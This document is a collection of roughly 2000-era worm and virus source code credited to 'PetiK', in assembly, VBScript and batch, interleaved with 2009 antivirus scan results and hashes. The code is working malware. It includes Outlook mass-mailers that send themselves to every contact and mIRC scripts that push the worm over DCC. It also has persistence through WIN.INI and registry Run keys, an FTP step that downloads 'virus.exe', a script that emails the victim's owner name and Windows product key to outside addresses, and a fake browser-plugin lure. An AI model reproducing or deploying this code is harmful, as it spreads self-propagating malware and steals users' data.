.data regDisp dd 0 regResu dd 0 l dd 0 p dd 0 fh dd 0 octets dd ? szOrig db 260 dup (0) szOrig2 db 260 dup (0) szCopie db 260 dup (0) szCopi2 db 260 dup (0) szCico db 260 dup (0) szWin db 260 dup (0) Dossier db "C:\Win32",00h fichier db "C:\Win32\Salut.ico",00h Copico db "\MSLS.ICO",00h Copie db "\Wininet32.exe",00h Copie2 db "\MadCow.exe",00h BATFILE db "C:\Win32\ENVOIE.BAT",00h VBSFILE db "C:\Win32\ENVOIE.VBS",00h Winini db "\\WIN.INI",00h run db "run",00h windows db "windows",00h fileini db "C:\Win32\script.ini",00h Copie3 db "C:\Win32\MadCow.exe",00h script1 db "C:\mirc\script.ini",00h script2 db "C:\mirc32\script.ini",00h script3 db "C:\program files\mirc\script.ini",00h script4 db "C:\program files\mirc32\script.ini",00h CLE db "Software\[Atchoum]",00h CLE2 db "\exefile\DefaultIcon",00h Signature db "IWorm.MadCow par PetiK (c)2000" vbsd: db 'DEBUT()',0dh,0ah db 'Sub DEBUT()',0dh,0ah db 'EMAIL()',0dh,0ah db 'End Sub',0dh,0ah db '',0dh,0ah db 'Sub EMAIL()',0dh,0ah db 'Set K = CreateObject("Outlook.Application")',0dh,0ah db 'Set L = K.GetNameSpace("MAPI")',0dh,0ah db 'For Each M In L.AddressLists',0dh,0ah db 'If M.AddressEntries.Count <> 0 Then',0dh,0ah db 'Set N = K.CreateItem(0)',0dh,0ah db 'For O = 1 To M.AddressEntries.Count',0dh,0ah db 'Set P = M.AddressEntries(O)',0dh,0ah db 'If O = 1 Then',0dh,0ah db 'N.BCC = P.Address',0dh,0ah db 'Else',0dh,0ah db 'N.BCC = N.BCC & "; " & P.Address',0dh,0ah db 'End If',0dh,0ah db 'Next',0dh,0ah db 'N.Subject = "Pourquoi les vaches sont-elles folles ?"',0dh,0ah db 'N.Body = "Voila un rapport expliquant la folie des vaches"',0dh,0ah db 'Set Q = CreateObject("Scripting.FileSystemObject")',0dh,0ah db 'N.Attachments.Add Q.BuildPath(Q.GetSpecialFolder(0),"MadCow.exe")',0dh,0ah db 'N.Send',0dh,0ah db 'End If',0dh,0ah db 'Next',0dh,0ah db 'End Sub',0dh,0ah vbstaille equ $-vbsd batd: db '@echo off',0dh,0ah db 'start C:\Win32\ENVOIE.VBS',0dh,0ah battaille equ $-batd inid: db "[script]",0dh,0ah db "n0=on 1:JOIN:#:{",0dh,0ah db "n1= /if ( $nick == $me ) { halt }",0dh,0ah db "n2= /.dcc send $nick C:\Win32\MadCow.exe",0dh,0ah db "n3=}",00h initaille equ $-inid include icone.inc
.code DEBUT: VERIF: mov eax,offset CLE ; Vérifie si il existe une clé call REG ; [Atchoum] dans HKLM\Software. cmp [regDisp],1 ; Si elle n'y est pas, jne INIFILE ; on installe les composants
COPIE: push 0 ; call GetModuleHandleA ; push 260 ; push offset szOrig ; push eax ; call GetModuleFileNameA ; Copie le fichier original push 260 ; push offset szCopie ; call GetSystemDirectoryA ; dans le dossier SYSTEM push offset Copie ; push offset szCopie ; call lstrcat ; sous le nom de Wininet32.exe push 00h ; push offset szCopie ; push offset szOrig ; call CopyFileA ; push 260 ; puis push offset szCopi2 ; call GetWindowsDirectoryA ; … nouveau dans le dossier WINDOWS push offset Copie2 ; push offset szCopi2 ; call lstrcat ; sous le nom de MadCow.exe push 00h ; push offset szCopi2 ; push offset szOrig ; call CopyFileA ;
WIN_INI:push 260 ; Pour lancer le programme, on peut push offset szWin ; call GetWindowsDirectoryA ; utiliser la base de registre ou le push offset Winini ; push offset szWin ; fichier WIN.INI dans le dossier call lstrcat ; push offset szWin ; WINDOWS. La démarche est simple : push offset szCopie ; [windows] push offset run ; run="nom du programme" push offset windows ; call WritePrivateProfileStringA ; DIR: push 00h ; On crée ici C:\Win32 push offset Dossier ; call CreateDirectoryA ; EMAIL :push 00000000h ; On va créer C:\Win32\ENVOIE.VBS push 00000080h ; push 00000002h ; push 00000000h ; push 00000001h ; push 40000000h ; push offset VBSFILE ; call CreateFileA ; mov [fh],eax ; push 00h ; push offset octets ; push vbstaille ; push offset vbsd ; push [fh] ; call WriteFile ; push [fh] ; call CloseHandle ; EXEC :push 00000000h ; et C:\Win32\ENVOIE.BAT push 00000080h ; push 00000002h ; qui va éxécuter ENVOIE.VBS push 00000000h ; push 00000001h ; push 40000000h ; push offset BATFILE ; call CreateFileA ; mov [fh],eax ; push 00h ; push offset octets ; push battaille ; push offset batd ; push [fh] ; call WriteFile ; push [fh] ; call CloseHandle ; jmp EXECBAT ;
REG: push offset regDisp ; push offset regResu ; push 0 ; push 0F003Fh ; push 0 ; push 0 ; push 0 ; push eax ; Software\[Atchoum] push 80000002h ; HKEY_LOCAL_MACHINE call RegCreateKeyExA ; push [regResu] ; met la valeur dans regResu call RegCloseKey ; ret ;
INIFILE:push 00000000h ; On va créer dans C:\Win32 push 00000001h ; push 00000002h ; le fichier script.ini push 00000000h ; push 00000001h ; en lecture seul. push 40000000h ; push offset fileini ; call CreateFileA ; mov [fh],eax ; push 00h ; push offset octets ; push initaille ; push offset inid ; push [fh] ; call WriteFile ; push [fh] ; call CloseHandle ;
push 00h ; On va copier ce fichier dans les push offset script1 ; répertoire suivant : push offset fileini ; call CopyFileA ; C:\mirc C:\mirc32 test eax,eax ; C:\program files\mirc et dans jnz COPYWIN ; C:\program files\mirc32 push 00h ; push offset script2 ; Si il arrive … se copier dans un push offset fileini ; de ces fichier, il va créer une call CopyFileA ; copie du programme dans C:\Win32 test eax,eax ; le nom MadCow.exe jnz COPYWIN ; push 00h ; push offset script3 ; push offset fileini ; call CopyFileA ; test eax,eax ; jnz COPYWIN ; push 00h ; push offset script4 ; push offset fileini ; call CopyFileA ; test eax,eax ; jz ICOFILE ;
COPYWIN:push 0 ; call GetModuleHandleA ; push 260 ; push offset szOrig2 ; push eax ; call GetModuleFileNameA ; Copie le fichier original push 00h ; push offset Copie3 ; push offset szOrig2 ; call CopyFileA ; jmp FIN ;
ICOFILE:push 00000000h ; On va créer … la base du disque push 00000080h ; push 00000002h ; dur le fichier Salut.ico push 00000000h ; push 00000001h ; push 40000000h ; push offset fichier ; call CreateFileA ; mov [fh],eax ; push 00h ; push offset octets ; push icotaille ; push offset icod ; push [fh] ; call WriteFile ; push [fh] ; call CloseHandle ; push 260 ; On déplace le fichier Salut.ico push offset szCico ; call GetSystemDirectoryA ; dans le dossier SYSTEM sous push offset Copico ; push offset szCico ; MSLS.ICO call lstrcat ; push offset szCico ; push offset fichier ; call MoveFileA ; => c'est fait
REG2: push offset l ; push offset p ; push 0 ; push 1F0000h + 1 + 2h ; push 0 ; push 0 ; push 0 ; push offset CLE2 ; Run push 80000000h ; HKEY_CLASSES_ROOT call RegCreateKeyExA ; push 05h ; push offset szCico ; %system%\MSLS.ico push 01h ; push 0 ; push 00h ; VALEUR PAR DEFAUT push p ; call RegSetValueExA ; CREE UN REGISTRE push 0 ; call RegCloseKey ; FERME LA BASE DE REGISTRE jmp FIN ; PUIS TERMINE LE PROGRAMME EXECBAT:push 01h ; On éxécute le fichier ENVOIE.BAT push offset BATFILE ; call WinExec ; FIN: push 00h ; FIN DU PROGRAMME call ExitProcess ; end DEBUT File MadCow.exe received on 05.16.2009 17:51:57 (CET) Antivirus Version Last Update Result a-squared 4.0.0.101 2009.05.16 Email-Worm.Win32.Petik!IK AhnLab-V3 5.0.0.2 2009.05.16 Win32/PetTick.worm.8192 AntiVir 7.9.0.168 2009.05.15 Worm/Petik Antiy-AVL 2.0.3.1 2009.05.15 Worm/Win32.Win32 Authentium 5.1.2.4 2009.05.16 W32/Petik.E Avast 4.8.1335.0 2009.05.15 IRC:Generic-008 AVG 8.5.0.336 2009.05.15 I-Worm/Petik BitDefender 7.2 2009.05.16 Generic.Malware.IM.5B177226 CAT-QuickHeal 10.00 2009.05.15 W32.Petik.A ClamAV 0.94.1 2009.05.16 Worm.Madcow Comodo 1157 2009.05.08 Worm.Win32.Petik.Z DrWeb 5.0.0.12182 2009.05.16 Win32.Petik.8192 eSafe 7.0.17.0 2009.05.14 - eTrust-Vet 31.6.6508 2009.05.16 Win32/Petik.8192.B/C F-Prot 4.4.4.56 2009.05.16 W32/Petik.E F-Secure 8.0.14470.0 2009.05.15 Email-Worm.Win32.Petik Fortinet 3.117.0.0 2009.05.16 W32/Petik.E@mm GData 19 2009.05.16 Generic.Malware.IM.5B177226 Ikarus T3.1.1.49.0 2009.05.16 Email-Worm.Win32.Petik K7AntiVirus 7.10.737 2009.05.16 Email-Worm.Win32.Petik Kaspersky 7.0.0.125 2009.05.16 Email-Worm.Win32.Petik McAfee 5616 2009.05.15 W32/PetTick@MM McAfee+Artemis 5616 2009.05.15 W32/PetTick@MM McAfee-GW-Edition 6.7.6 2009.05.15 Worm.Petik Microsoft 1.4602 2009.05.16 Worm:Win32/Petick@mm NOD32 4080 2009.05.15 Win32/Petik.Z Norman 6.01.05 2009.05.16 W32/Pet_Tick.8192.D nProtect 2009.1.8.0 2009.05.16 - Panda 10.0.0.14 2009.05.16 W32/Petik.A PCTools 4.4.2.0 2009.05.16 VBS.LoveLetter Prevx 3.0 2009.05.16 - Rising 21.29.52.00 2009.05.16 Worm.Mail.Petik.x Sophos 4.41.0 2009.05.16 W32/Petik-A Sunbelt 3.2.1858.2 2009.05.16 Email-Worm.Win32.Petik Symantec 1.4.4.12 2009.05.16 W95.Pet_Tick.gen TheHacker 6.3.4.1.326 2009.05.15 W32/PetTick@MM TrendMicro 8.950.0.1092 2009.05.15 WORM_PETIK.E VBA32 3.12.10.5 2009.05.16 Win32.Worm.Petik.8192 ViRobot 2009.5.15.1737 2009.05.15 - VirusBuster 4.6.5.0 2009.05.16 VBS.LoveLetter Additional information File size: 8192 bytes MD5...: 15b037d0d23a915fb0a78961cdc7299a SHA1..: 85864e397e3fee261bdcb62b477a71e936db39f6 ;Par M.Xxxxxxx XXXXXXX (c)2000 ;TAILLE : 1034 OCTETS ;DWARF4 MODIFIE LA DATE AU 26 DECEMBRE 1999 ;C:\DWARF.VBS QUI AJOUTE UN CLE DANS LA BASE DE REGISTRE ;C:\WINDOWS\DWARF.BAT QUI AFFICHE UN MESSAGE A CHAQUE DEMARRAGE
.model small .code org 100h
DATE: mov ah,2Bh mov dh,12 mov dl,26 mov cx,1999 int 21h ;26 DECEMBRE 1999 HEURE: mov ah,2Dh xor cx,cx xor dx,dx int 21h ;MINUIT FILE1: mov ah,3Ch xor cx,cx mov dx,offset NOM1 int 21h ;création du 1er fichier xchg ax,bx mov ah,40h mov cx,progl1 mov dx,offset prog1 int 21h ;écriture mov ah,3Eh int 21h ;fermeture FILE2: mov ah,3Ch xor cx,cx mov dx,offset NOM2 int 21h ;création du 2nd fichier xchg ax,bx mov ah,40h mov cx,progl2 mov dx,offset prog2 int 21h ;‚criture mov ah,3Eh int 21h ;fermeture MESSAGE: mov ax,3 int 10h mov ah,9 lea dx,msg int 21h FIN: mov ah,4Ch int 21h NOM1 db 'c:\dwarf.vbs',0 NOM2 db 'c:\WINDOWS\Panda.bat',0 prog1 db 'rem DwArF.vbs by Panda (c)2000',0Dh,0Ah db 'msgbox "BONNO JOURNEE ?"',0Dh,0Ah db 'Dim W',0Dh,0Ah db 'Set W = Wscript.CreateObject("WScript.Shell")',0Dh,0Ah db 'W.Regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows' db '\CurrentVersion\Run\DwArF", "C:\WINDOWS\dwarf.bat"' progl1 equ $-prog1 prog2 db '@echo off',0Dh,0Ah db 'if exist c:\dwarf.vbs del c:\dwarf.vbs',0Dh,0Ah db 'cls',0Dh,0Ah db 'echo.',0Dh,0Ah db 'echo UNE BOMBE A ETE PLACE DANS TON ORDINATEUR',0Dh,0Ah db 'echo.',0Dh,0Ah db 'echo DANS 5 SECONDES TU VAS MOURIR',0Dh,0Ah db 'echo.',0Dh,0Ah db 'choice /c:Q /t:Q,5 /n Le compte à rebours a commencé',0Dh,0Ah db 'if errorlevel 1 goto Die',0Dh,0Ah db ':Die',0Dh,0Ah db 'cls',0Dh,0Ah db 'echo.',0Dh,0Ah db 'echo.',0Dh,0Ah db 'echo.',0Dh,0Ah db 'echo.',0Dh,0Ah db 'echo.',0Dh,0Ah db 'echo *** *** *** * *',0Dh,0Ah db 'echo * * * * * * ** **',0Dh,0Ah db 'echo * * * * * * * * *',0Dh,0Ah db 'echo * * * * * * * *',0Dh,0Ah db 'echo * * * * * * * *',0Dh,0Ah db 'echo * * * * * * * *',0Dh,0Ah db 'echo *** *** *** * *',0Dh,0Ah progl2 equ $-prog2 CORBEILLE db 'C:\RECYCLED\*.*',0 msg db 7,7,7,10,13,'UN FICHIER A ETE CREE',0Ah,0Ah,0Dh db 'IL SE NOMME C:\dwarf.vbs',10,10,13 db 'OUVRE LE VITE $' end DATE ' Name : VBS.Judge.A ' Author : PetiK ' Language : VBS ' Date : 08/12/2000
' Copy itself to %windir%\WinGDI.EXE.vbs and C:\Judge.TXT.vbs ' Add to HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices\ ' WinGDI = %windir%\WinGDI.EXE.vbs ' Function EMAIL : Scan Address Contact and send a mail with copy. 'VBS.Judge.A par Petik (c)2000
Dim fso,ws,file Set fso = CreateObject("Scripting.FileSystemObject") Set ws = CreateObject("WScript.Shell") Set file = fso.OpenTextFile(WScript.ScriptFullname,1) vbs = file.ReadAll
DEBUT() Sub DEBUT() Set win = fso.GetSpecialFolder(0) Set c = fso.GetFile(WScript.ScriptFullName) c.Copy(win&"\WinGDI.EXE.vbs") c.Copy("C:\Judge.TXT.vbs") ws.RegWrite "HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices\WinGDI",win&"\WinGDI.EXE.vbs" EMAIL() 'FTP() 'AUTOEXEC() TXT() End Sub
Sub EMAIL() If Not fso.FileExists("C:\Judge.txt") Then Set OApp = CreateObject("Outlook.Application") if oapp="Outlook" then Set Mapi = OApp.GetNameSpace("MAPI") For Each AddList In Mapi.AddressLists If AddList.AddressEntries.Count <> 0 Then For AddListCount = 1 To AddList.AddressEntries.Count Set AddListEntry = AddList.AddressEntries(AddListCount) Set msg = OApp.CreateItem(0) msg.To = AddListEntry.Address msg.Subject = "BatMan, SpiderMan et les autres" msg.Body = "La vraie histoire de ces justiciers" msg.Attachments.Add "C:\Judge.TXT.vbs" msg.DeleteAfterSubmit = True If msg.To <> "" Then msg.Send End If Next End If Next end if End If End Sub
Sub FTP() If Not fso.FileExists("C:\Judge.txt") Then Set bat = fso.CreateTextFile(win&"\FTP.bat") bat.WriteLine "@echo off" bat.WriteLine "start ftp -i -v -s:C:\FTP.drv" bat.close Set drv = fso.CreateTextFile("C:\FTP.drv") drv.WriteLine "open" drv.WriteLine "members.aol.com" drv.WriteLine "pentasm99" drv.WriteLine "binary" drv.WriteLine "lcd C:\" drv.WriteLine "get virus.exe" drv.WriteLine "bye" drv.WriteLine "exit" drv.close ws.Run (win&"\FTP.bat") End If End Sub
Sub AUTOEXEC() If Day(Now) = 1 then Set FileObj = CreateObject("Scripting.FileSystemObject") file = "c:\autoexec.bat" Set InStream= FileObj.OpenTextFile (file, 1, False, False) TLine = Instream.Readall Set autobat= FileObj.CreateTextFile (file, True, False) autobat.write(tline) autobat.WriteBlankLines(1) autobat.WriteLine "@echo off" autobat.WriteLine "cls" autobat.WriteLine "echo." autobat.WriteLine "echo." autobat.WriteLine "echo VBS.Judge.A par PetiK (c)2000" autobat.WriteLine "echo." autobat.WriteLine "echo TON ORDINATEUR VIENT DE MOURIR" autobat.WriteLine "pause" End If End Sub
Sub TXT() Set ptk = fso.CreateTextFile("C:\Judge.txt") ptk.WriteLine "Si vous lisez ce texte," ptk.WriteLine "c'est que Microsoft a encors fait des siennes" ptk.Close Set mp3 = fso.OpenTextFile("C:\Salut.mp3",2,true) mp3.Write vbs mp3.close End Sub File Judge.TXT.vbs received on 05.16.2009 17:42:50 (CET) Antivirus Version Last Update Result a-squared 4.0.0.101 2009.05.16 Email-Worm.Win32.Petik!IK AhnLab-V3 5.0.0.2 2009.05.16 VBS/Anjulie AntiVir 7.9.0.168 2009.05.15 Worm/Petik.AV.03 Antiy-AVL 2.0.3.1 2009.05.15 Worm/Win32.Win32 Authentium 5.1.2.4 2009.05.16 VBS/Petik.L@mm Avast 4.8.1335.0 2009.05.15 VBS:MailWorm-gen AVG 8.5.0.336 2009.05.15 VBS/VBSWG BitDefender 7.2 2009.05.16 Generic.ScriptWorm.A9DC8F67 CAT-QuickHeal 10.00 2009.05.15 - ClamAV 0.94.1 2009.05.16 Worm.VBS-14 Comodo 1157 2009.05.08 - DrWeb 5.0.0.12182 2009.05.16 VBS.Petik eSafe 7.0.17.0 2009.05.14 - eTrust-Vet 31.6.6508 2009.05.16 VBS/Buggy F-Prot 4.4.4.56 2009.05.16 VBS/Petik.L@mm F-Secure 8.0.14470.0 2009.05.15 Email-Worm.Win32.Petik Fortinet 3.117.0.0 2009.05.16 VBS/Judge.A GData 19 2009.05.16 Generic.ScriptWorm.A9DC8F67 Ikarus T3.1.1.49.0 2009.05.16 Email-Worm.Win32.Petik K7AntiVirus 7.10.737 2009.05.16 - Kaspersky 7.0.0.125 2009.05.16 Email-Worm.Win32.Petik McAfee 5616 2009.05.15 VBS/Generic McAfee+Artemis 5616 2009.05.15 VBS/Generic McAfee-GW-Edition 6.7.6 2009.05.15 Worm.Petik.AV.03 Microsoft 1.4602 2009.05.16 Virus:VBS/Petik.I NOD32 4080 2009.05.15 VBS/Petik.A Norman 6.01.05 2009.05.16 VBS/GenMail.D nProtect 2009.1.8.0 2009.05.16 VBS.Petik.A@mm Panda 10.0.0.14 2009.05.16 VBS/I-Worm PCTools 4.4.2.0 2009.05.16 VBS.Petik.I Prevx 3.0 2009.05.16 - Rising 21.29.52.00 2009.05.16 Worm.Hopalong Sophos 4.41.0 2009.05.16 VBS/Judge Sunbelt 3.2.1858.2 2009.05.16 - Symantec 1.4.4.12 2009.05.16 VBS.Pet_Tick.B@mm TheHacker 6.3.4.1.326 2009.05.15 - TrendMicro 8.950.0.1092 2009.05.15 VBS_JUDGE.A VBA32 3.12.10.5 2009.05.16 Email-Worm.Win32.Petik ViRobot 2009.5.15.1737 2009.05.15 VBS.Worm-Family VirusBuster 4.6.5.0 2009.05.16 VBS.Petik.I Additional information File size: 2587 bytes MD5...: 538a05a6e0dd048eae2c3b06338bd5d7 SHA1..: fef767df96e3dbeb009d6cd746bee12c33fb3257 ' Name : VBS.Noel ' Author : PetiK ' Language : VBS ' Date : 12/12/2000
Dim fso,ws,file Set fso = CreateObject("Scripting.FileSystemObject") Set ws = CreateObject("WScript.Shell")
DEBUT() Sub DEBUT() Set win = fso.GetSpecialFolder(0) Set c = fso.GetFile(WScript.ScriptFullName) c.Copy("C:\NOEL.GIF.vbs") EMAIL() End Sub
Sub EMAIL() Set OApp = CreateObject("Outlook.Application") if oapp="Outlook" then Set Mapi = OApp.GetNameSpace("MAPI") For Each AddList In Mapi.AddressLists If AddList.AddressEntries.Count <> 0 Then For AddListCount = 1 To AddList.AddressEntries.Count Set AddListEntry = AddList.AddressEntries(AddListCount) Set msg = OApp.CreateItem(0) msg.To = AddListEntry.Address msg.Subject = "JOUYEUX NOEL" msg.Body = "Voici une photodu PERE NOEL" msg.Attachments.Add ("C:\NOEL.GIF.vbs") If msg.To <> "" Then msg.Send End If Next End If Next End if Set msg2 = OApp.CreateItem(0) msg2.BCC = "[email protected]; [email protected]" nom = ws.RegRead("HKLM\software\Microsoft\Windows\CurrentVersion\RegisteredOwner") CN = CreateObject("WScript.NetWork").ComputerName msg2.Subject = "Message de """ & nom & """ alias " & CN & "" page = ws.RegRead("HKCU\Software\Microsoft\Internet Explorer\Main\Start Page") PK = ws.RegRead("HKLM\software\Microsoft\Windows\CurrentVersion\ProductKey") msg2.Body = "-IE : """ & page & """ -Produkt Key """ & PK & """" msg2.Send End Sub File NOEL.GIF.vbs received on 05.11.2009 07:04:27 (CET) Antivirus Version Last Update Result a-squared 4.0.0.101 2009.05.11 Email-Worm.Win32.Petik!IK AhnLab-V3 5.0.0.2 2009.05.11 VBS/Petik AntiVir 7.9.0.166 2009.05.10 Worm/Petik.J1 Antiy-AVL 2.0.3.1 2009.05.08 Worm/Win32.Win32 Authentium 5.1.2.4 2009.05.10 VBS/Petik.M@mm Avast 4.8.1335.0 2009.05.10 VBS:MailWorm-gen AVG 8.5.0.327 2009.05.10 VBS/VBSWG BitDefender 7.2 2009.05.11 Generic.ScriptWorm.A79766E0 CAT-QuickHeal 10.00 2009.05.09 VBS/Petik.M ClamAV 0.94.1 2009.05.11 - Comodo 1157 2009.05.08 Worm.Win32.Email-Worm.Petik DrWeb 5.0.0.12182 2009.05.11 modification of VBS.Generic.458 eSafe 7.0.17.0 2009.05.10 - eTrust-Vet 31.6.6497 2009.05.08 VBS/Buggy F-Prot 4.4.4.56 2009.05.10 VBS/Petik.M@mm F-Secure 8.0.14470.0 2009.05.11 Email-Worm.Win32.Petik Fortinet 3.117.0.0 2009.05.10 VBS/Petik.J@mm GData 19 2009.05.11 Generic.ScriptWorm.A79766E0 Ikarus T3.1.1.49.0 2009.05.11 Email-Worm.Win32.Petik K7AntiVirus 7.10.729 2009.05.08 - Kaspersky 7.0.0.125 2009.05.11 Email-Worm.Win32.Petik McAfee 5611 2009.05.10 W32/PetTick.vbs McAfee+Artemis 5611 2009.05.10 W32/PetTick.vbs McAfee-GW-Edition 6.7.6 2009.05.11 Worm.Petik.J1 Microsoft 1.4602 2009.05.10 Virus:VBS/Petik.J NOD32 4063 2009.05.08 probably unknown SCRIPT Norman 6.01.05 2009.05.08 VBS/GenMail.D nProtect 2009.1.8.0 2009.05.10 VBS.Petik.B@mm Panda 10.0.0.14 2009.05.10 - PCTools 4.4.2.0 2009.05.07 VBS.Petik.J Prevx 3.0 2009.05.11 - Rising 21.29.00.00 2009.05.11 Worm.Hopalong Sophos 4.41.0 2009.05.11 VBS/Petik-J Sunbelt 3.2.1858.2 2009.05.09 - Symantec 1.4.4.12 2009.05.11 VBS.LoveLetter.Var TheHacker 6.3.4.1.324 2009.05.09 - TrendMicro 8.950.0.1092 2009.05.11 VBS_GENERIC.009 VBA32 3.12.10.4 2009.05.11 Email-Worm.Win32.Petik ViRobot 2009.5.11.1728 2009.05.11 VBS.Worm-Family VirusBuster 4.6.5.0 2009.05.10 VBS.Petik.J Additional information File size: 1352 bytes MD5...: fcc75e971157a8d9103b5bc583847f87 SHA1..: 2fd63f05fb1a2ee79db2d227f902f94fa12851b5 comment $
W32.TWIN par PetiK le 20/12/2000
POUR COMPILER: tasm32 /M /ML ?????.asm tlink32 -Tpe -x -aa ?????.obj,,,import32
$
.386 jumps locals .model flat, stdcall
;KERNEL32.dll extrn lstrcat:PROC extrn WritePrivateProfileStringA:PROC extrn GetModuleFileNameA:PROC extrn CopyFileA:PROC extrn CreateFileA:PROC extrn WriteFile:PROC extrn CloseHandle:PROC extrn ExitProcess:PROC extrn GetModuleHandleA:PROC extrn GetSystemDirectoryA:PROC extrn GetWindowsDirectoryA:PROC
;USER32.dll extrn MessageBoxA:PROC
;ADVAPI32.dll extrn RegCreateKeyExA:PROC extrn RegSetValueExA:PROC extrn RegCloseKey:PROC .data fh dd ? octets dd ? regDisp dd 0 regResu dd 0 l dd 0 p dd 0 szBAT db 260 dup (0) szCopie db 260 dup (0) szOrig db 260 dup (0) szHTM db 260 dup (0) szVBS db 260 dup (0) szWin db 260 dup (0) Copie db "\NAV5.exe",00h BATFILE db "\IE55.bat",00h HTMFILE db "\IE55.htm",00h VBSFILE db "\IE55.vbs",00h Winini db "\\WIN.INI",00h run db "run",00h windows db "windows",00h CLE db "Software\[PetiK]",00h CLE2 db "\Software\Microsoft\Internet Explorer\Main",00h NOM2 db "Start Page",00h vbsd: db 'rem IE55.vbs pour W32.TWiN',0dh,0ah db '',0dh,0ah db 'Dim fso,ws,file',0dh,0ah db 'Set fso = CreateObject("Scripting.FileSystemObject")',0dh,0ah db 'Set ws = CreateObject("WScript.Shell")',0dh,0ah db 'DEBUT()',0dh,0ah db 'Sub DEBUT()',0dh,0ah db 'Set win = fso.GetSpecialFolder(0)',0dh,0ah db 'Set sys = fso.GetSpecialFolder(1)',0dh,0ah db 'ws.Run (sys&"\IE55.htm")',0dh,0ah db 'ws.RegWrite "HKCU\Software\Microsoft\Internet Explorer\' db 'Download Directory","C:\"',0dh,0ah db 'If fso.FileExists("C:\PlugIE55.exe") Then',0dh,0ah db 'ws.RegWrite "HKCU\Software\Microsoft\Internet Explorer\Main\' db 'Start Page","http://www.atoutmicro.ca/viralert.htm"',0dh,0ah db 'ws.RegWrite "HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce\' db 'PlugIE55","C:\PlugIE55.exe"',0dh,0ah db 'End If',0dh,0ah db 'MIRC()',0dh,0ah db 'End Sub',0dh,0ah db '',0dh,0ah db 'Sub MIRC()',0dh,0ah db 'On Error Resume Next',0dh,0ah db 'If fso.FileExists("C:\mirc\script.ini") Then',0dh,0ah db ' Set c = (sys&"\NAV5.exe")',0dh,0ah db ' c.Copy("C:\mirc\XPICTURE.exe")',0dh,0ah db ' Set srpt = fso.CreateTextFile("C:\mirc\script.ini",true)',0dh,0ah db ' srpt.WriteLine "[script]"',0dh,0ah db ' srpt.WriteLine "n0=on 1:JOIN:#:{"',0dh,0ah db ' srpt.WriteLine "n1= /if ( $nick == $me ) { halt }"',0dh,0ah db ' srpt.WriteLine "n2= /.dcc send $nick C:\mirc\XPICTURE.exe"',0dh,0ah db ' srpt.WriteLine "n3=}"',0dh,0ah db ' srpt.Close',0dh,0ah db 'End If',0dh,0ah db 'End Sub',0dh,0ah vbstaille equ $-vbsd htmd: db '
',0dh,0ah db 'Plugin pour Microsoft Internet Explorer
',0dh,0ah db 'Plugin for Microsoft Internet Explorer
',0dh,0ah db '',0dh,0ah db '
Merci de télécharger le plugin dans le réperoire C:\
',0dh,0ah db 'Please download the plugin in C:\ path
',0dh,0ah db '',0dh,0ah db '
.code DEBUT: mov eax, offset CLE ; Vérifie si il existe une clé call REG ; [PetiK] dans HKLM\Software. cmp [regDisp],1 ; Si elle n'y est pas, il se copie jne FIN ; puis modifie le fichier WIN.INI
WCOPIE: push 0 ; call GetModuleHandleA ; push 260 ; Le programme se copie dans le push offset szOrig ; push eax ; call GetModuleFileNameA ; dossier WINDOWS de l'ordinateur push 260 ; push offset szCopie ; et se nommera NAV5.exe call GetWindowsDirectoryA ; push offset Copie ; push offset szCopie ; call lstrcat ; push 0 ; push offset szCopie ; push offset szOrig ; call CopyFileA ;
WIN_INI:push 260 ; On met dans le fichier WIN.INI push offset szWin ; une routine pour que le programme call GetWindowsDirectoryA ; s'active à chaque démarrage. push offset Winini ; Cela évite d'utiliser la BASE DE push offset szWin ; REGISTRE trop voyante. call lstrcat ; push offset szWin ; Dans WIN.INI du dossier WINDOWS push offset szCopie ; "nom du programme" push offset run ; run= push offset windows ; [windows] call WritePrivateProfileStringA ;
BAT: push 260 ; push offset szBAT ; call GetSystemDirectoryA ; push offset BATFILE ; push offset szBAT ; call lstrcat ; push 00000000h ; push 00000080h ; push 00000002h ; push 00000000h ; push 00000001h ; push 40000000h ; push offset szBAT ; call CreateFileA ; mov [fh],eax ; push 00h ; push offset octets ; push battaille ; push offset batd ; push [fh] ; call WriteFile ; push [fh] ; call CloseHandle ;
VBS: push 260 ; On va créer un fichier push offset szVBS ; call GetSystemDirectoryA ; dans le réperoire SYSTEM push offset VBSFILE ; push offset szVBS ; qui s'appelle IE55.VBS call lstrcat ; push 00000000h ; push 00000080h ; push 00000002h ; push 00000000h ; push 00000001h ; push 40000000h ; push offset szVBS ; call CreateFileA ; mov [fh],eax ; push 00h ; push offset octets ; push vbstaille ; push offset vbsd ; push [fh] ; call WriteFile ; push [fh] ; call CloseHandle ;
HTM: push 260 ; On va créer un fichier push offset szHTM ; call GetSystemDirectoryA ; dans le réperoire SYSTEM push offset HTMFILE ; push offset szHTM ; qui s'appelle IE55.HTM call lstrcat ; push 00000000h ; push 00000080h ; push 00000002h ; push 00000000h ; push 00000001h ; push 40000000h ; push offset szHTM ; call CreateFileA ; mov [fh],eax ; push 00h ; push offset octets ; push htmtaille ; push offset htmd ; push [fh] ; call WriteFile ; push [fh] ; call CloseHandle ;
BDR: push offset l ; push offset p ; push 0 ; push 1F0000h + 1 + 2h ; push 0 ; push 0 ; push 0 ; push offset CLE2 ; push 80000001h ; HKEY_CURRENT_USER call RegCreateKeyExA ; push 05h ; push offset szVBS ; On va créer une clé dans la push 01h ; push 0 ; push offset NOM2 ; Base de Registre pour qu'il push p ; call RegSetValueExA ; push 0 ; active le fichier VBS quand on call RegCloseKey ; va sur internet jmp FIN ;
REG: push offset regDisp ; push offset regResu ; push 0 ; default security descriptor push 0F003FH ; KEY_ALL_ACCESS push 0 ; push 0 ; push 0 ; push eax ; adresse de la sous-CLE push 80000002h ; HKEY_LOCAL_MACHINE call RegCreateKeyExA ; push [regResu] ; call RegCloseKey ; ret ; FIN: push 0 ; call ExitProcess ; Fin du Programme end DEBUT
IE55.HTM
Plugin pour Microsoft Internet Explorer
Plugin for Microsoft Internet Explorer
Merci de télécharger le plugin dans le réperoire C:\
Please download the plugin in C:\ path
'VBS/mIRC/NetWork.A par PetiK 29/12/2000 Dim fso,ws,file Set fso = CreateObject("Scripting.FileSystemObject") Set ws = CreateObject("WScript.Shell") set file = fso.OpenTextFile(WScript.ScriptFullName,1) vbscopie = file.ReadAll
